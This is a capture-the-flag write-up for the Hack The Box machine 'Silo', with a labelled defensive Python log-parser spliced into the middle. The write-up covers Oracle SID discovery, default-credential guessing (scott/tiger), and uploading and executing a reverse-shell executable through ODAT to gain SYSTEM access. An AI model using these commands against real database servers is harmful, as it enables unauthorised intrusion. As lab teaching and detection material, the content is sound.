HTB - Silo
Getting Root:
Used ODAT (Oracle Database Attacking Tool) to enumerate the Oracle database server
Uploaded a reverse shell with ODAT and got a shell as SYSTEM
Tools Used:
odat (Oracle Database Attacking Tool)
Nmap
nmap -sC -sV -p- -oA nmap/Silo 10.10.10.82
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-10 18:19 EDT
Nmap scan report for 10.10.10.82
Host is up (0.13s latency).
Not shown: 65520 closed ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49161/tcp open  msrpc        Microsoft Windows RPC
49162/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2m25s, deviation: 0s, median: 2m25s
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-03-10T23:17:51
|_  start_date: 2020-03-10T22:20:22
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3377.71 seconds
Enumeration
HTTP
From the response headers we can see it's an IIS server running version 8.5 with ASP.NET enabled:
curl -I http://10.10.10.82
HTTP/1.1 200 OK
Content-Length: 701
Content-Type: text/html
Last-Modified: Wed, 03 Jan 2018 00:36:17 GMT
Accept-Ranges: bytes
ETag: "1114bde2a84d31:0"
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Tue, 10 Mar 2020 22:29:07 GMT
Oracle
nmap --script oracle-* 10.10.10.82 -p 1521
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-10 21:44 EDT
Nmap scan report for silo (10.10.10.82)
Host is up (0.10s latency).
PORT     STATE SERVICE
1521/tcp open  oracle
| oracle-sid-brute:
|_  XE
Nmap done: 1 IP address (1 host up) scanned in 235.94 seconds
Using ODAT
ODAT: Oracle Database Attacking Tool
Finding the SID
I did this with nmap (see Enumeration above), but it can also be done with ODAT.
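The listener side of the SID guessing described above, as an added defender's example that is not part of this writeup: it reads Oracle listener.log "establish" records and flags any client host that the listener refused for many different SIDs. The record layout and the 12505 (unknown SID) return code are assumed from Oracle's standard listener.log format, and the sample lines are constructed.

```python
"""Flag Oracle SID guessing from TNS listener.log records (added example;
record layout and return codes assumed from the standard log, data constructed)."""
import re
from collections import defaultdict

# Inside an "establish" record: the requested SID/service name and the client host.
SID_RE = re.compile(r"\((?:SID|SERVICE_NAME)=([^)]*)\)")
HOST_RE = re.compile(r"\(HOST=([^)]+)\)")


def parse_establish(line):
    """Return (timestamp, client_host, sid, return_code) for a listener.log
    'establish' record, or None for continuation and non-connection lines."""
    parts = line.strip().split(" * ")
    if len(parts) != 6 or parts[3] != "establish":
        return None
    ts, connect_data, address, _, _, rc = parts
    sid = SID_RE.search(connect_data)
    host = HOST_RE.search(address)  # client ADDRESS only, not the CID's HOST
    if not sid or not host or not rc.isdigit():
        return None
    return ts, host.group(1), sid.group(1), int(rc)


def sid_bruteforce_sources(lines, min_distinct_sids=5):
    """Map client host -> sorted distinct SIDs the listener refused it
    (return code != 0, e.g. 12505 = unknown SID), keeping only hosts refused
    for at least min_distinct_sids different names: the wordlist walkers."""
    refused = defaultdict(set)
    for line in lines:
        rec = parse_establish(line)
        if rec is None:
            continue
        _, host, sid, rc = rec
        if rc != 0:
            refused[host].add(sid)
    return {h: sorted(s) for h, s in refused.items() if len(s) >= min_distinct_sids}


# Constructed sample: one client walks a SID wordlist until XE is accepted,
# while a legitimate sqlplus client connects by service name.
SAMPLE_LOG = """\
10-MAR-2020 22:30:01 * (CONNECT_DATA=(SID=ORCL)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.3)(PORT=41230)) * establish * ORCL * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
10-MAR-2020 22:30:01 * (CONNECT_DATA=(SID=PLSExtProc)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.3)(PORT=41231)) * establish * PLSExtProc * 12505
10-MAR-2020 22:30:02 * (CONNECT_DATA=(SID=TEST)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.3)(PORT=41232)) * establish * TEST * 12505
10-MAR-2020 22:30:02 * (CONNECT_DATA=(SID=orcl)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.3)(PORT=41233)) * establish * orcl * 12505
10-MAR-2020 22:30:03 * (CONNECT_DATA=(SID=oracle)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.3)(PORT=41234)) * establish * oracle * 12505
10-MAR-2020 22:30:05 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.3)(PORT=41235)) * establish * XE * 0
10-MAR-2020 22:31:10 * (CONNECT_DATA=(SERVICE_NAME=XE)(CID=(PROGRAM=sqlplus)(HOST=app01)(USER=oracle))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.10.5)(PORT=50012)) * establish * XE * 0
"""

if __name__ == "__main__":
    print(sid_bruteforce_sources(SAMPLE_LOG.splitlines()))
```

The accepted XE connection from the same host is deliberately not counted; the refusals that precede it are what distinguish a guesser from a client that simply mistyped one SID.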
Brute Forcing Creds
The GitHub repo ships some default username and password files under a directory named accounts. The default file is accounts/accounts.txt.
python3 odat.py passwordguesser -s 10.10.10.82 -d XE
odat.py:52: DeprecationWarning: the imp module is deprecated in favour of importlib; see the module's documentation for alternative uses
import imp
[1] (10.10.10.82:1521): Searching valid accounts on the 10.10.10.82 server, port 1521
[+] Valid credentials found: scott/tiger. Continue...
100% |#######################################################################################################################################################################| Time: 00:17:00
[+] Accounts found on 10.10.10.82:1521/XE:
scott/tiger
ODAT found: scott/tiger
Because I don't know much about Oracle databases, I googled the term "Kali Linux enumerate oracle databases" and I was able to find this link which shows the default usernames and passwords on Oracle databases.
# usernames and passwords from the website I found.
dbsnmp/dbsnmp
sys/change_on_install
pcms_sys/pcms_sys
wmsys/wmsys
outln/outln
scott/tiger
As you can see, scott/tiger are simply default creds.
Getting a Shell
Uploading the reverse shell I created with msfvenom
# odat utlfile -s 10.10.10.82 -U scott -P tiger -d XE --sysdba --putFile "C:\Temp" shellie.exe /root/HackTheBox/Silo/files/shellie.exe
[1] (10.10.10.82:1521): Put the /root/HackTheBox/Silo/files/shellie.exe local file in the C:\Temp folder like shellie.exe on the 10.10.10.82 server
[+] The /root/HackTheBox/Silo/files/shellie.exe file was created on the C:\Temp directory on the 10.10.10.82 server like the shellie.exe file
Executing the file
# odat externaltable -s 10.10.10.82 -U scott -P tiger -d XE --sysdba --exec "C:\Temp" shellie.exe
[1] (10.10.10.82:1521): Execute the shellie.exe command stored in the C:\Temp path
Got a shell as SYSTEM
# rlwrap nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.82] 49163
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>whoami
whoami
nt authority\system
System Info
Host Name: SILO
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00252-00115-23036-AA976
Original Install Date: 12/31/2017, 11:01:23 PM
System Boot Time: 3/11/2020, 4:03:30 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-gb;English (United Kingdom)
Input Locale: en-gb;English (United Kingdom)
Time Zone: (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory: 2,047 MB
Available Physical Memory: 722 MB
Virtual Memory: Max Size: 2,431 MB
Virtual Memory: Available: 1,137 MB
Virtual Memory: In Use: 1,294 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): 149 Hotfix(s) Installed.
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) 82574L Gigabit Network Connection
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.82
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.